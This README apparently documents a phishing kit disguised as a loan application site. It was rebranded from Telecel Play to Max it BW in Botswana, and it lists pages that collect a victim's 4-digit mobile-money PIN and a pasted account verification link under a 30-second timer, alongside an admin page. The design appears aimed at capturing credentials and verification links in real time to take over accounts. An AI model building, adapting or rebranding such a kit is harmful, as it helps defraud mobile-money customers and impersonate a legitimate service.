# Max it BW - Botswana Loan Application System 🇧🇼
This loan application system has been fully rebranded for **Max it BW** (Botswana).
## 🔄 Key Changes Made
### Branding Changes
- **Telecel Play** → **Max it BW**
- **Zimbabwe** → **Botswana**
- **Color Scheme**: Orange (#FF6B00) & Blue (#0066CC) theme
### Currency & Financial
- **Currency**: USD (US Dollars) → **P (Pula)** - Botswana's currency
- **Loan Range**: P 500 to P 50,000 (realistic for Botswana market)
- **Interest Rate**: 12% APR (unchanged)
### Contact & Location
- **Phone Code**: +263 (Zimbabwe) → **+267 (Botswana)**
- **Cities**: Gaborone, Francistown, Maun
- **Website**: maxitbw.co.bw
- **Email**: support@maxitbw.co.bw
### 🚨 CRITICAL Technical Changes
#### PIN System - 4 DIGITS ✅
- **Format**: 4-digit PIN (unchanged from original)
- **Reason**: Standard for mobile money
#### VERIFICATION SYSTEM - MAJOR CHANGE ⚠️
- **Previous**: 5-digit OTP code in separate boxes
- **Now**: **Single text box for pasting verification LINK**
- **Timer**: **30 seconds** (changed from 60 seconds)
- **Reason**: Max it BW uses link-based verification instead of numeric codes
#### Phone Number Format
- **Format**: +267 XX XXX XXX
- **Example**: +267 71 123 456
## 📁 Files Included
All files have been fully rebranded:
### HTML Files
- ✅ `index.html` - Landing page
- ✅ `application.html` - Loan application form
- ✅ `verification.html` - 4-digit PIN verification
- ✅ `otp.html` - **Link verification (30-second timer)** ⚠️ MAJOR CHANGE
- ✅ `approval.html` - Loan approval page
- ✅ `admin-select.html` - Admin selection
### JavaScript Files
- ✅ `landing-script.js` - Calculator & interactions (P currency)
- ✅ `application-script.js` - Form handling
- ✅ `verification-script.js` - PIN verification logic
- ✅ `otp-script.js` - **Link handling (30-second timer)** ⚠️ MAJOR CHANGE
- ✅ `approval-script.js` - Approval page logic (P currency)
### Backend Files
- ✅ `server.js` - Express backend
- ✅ `database.js` - MongoDB configuratio …